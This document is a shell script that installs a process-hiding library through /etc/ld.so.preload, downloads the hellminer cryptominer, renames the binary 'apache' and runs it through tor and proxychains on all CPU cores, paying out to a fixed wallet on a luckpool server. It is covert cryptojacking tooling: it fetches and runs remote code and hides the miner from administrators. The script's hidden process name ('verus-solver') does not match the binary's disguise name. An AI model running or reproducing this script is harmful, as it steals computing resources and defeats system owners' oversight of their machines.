#!/bin/sh
sudo apt update
sudo apt install nano tor proxychains -y 
sudo service tor start

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider
sed -i 's/apache/verus-solver/' processhider.c
make
sudo mv libprocesshider.so /usr/local/lib/;sudo su -c 'echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload'
cd ..
sudo rm libprocesshider -r

wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
tar xf hellminer_cpu_linux.tar.gz
rm hellminer_cpu_linux.tar.gz
mv hellminer apache

sleep 5s

sudo proxychains ./apache -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RKJZtNARyonv8N2GtPAo5E7sn8uHPjt2LZ.kuyax-$(echo $(nproc --all)) -p x --cpu $(echo $(nproc --all))
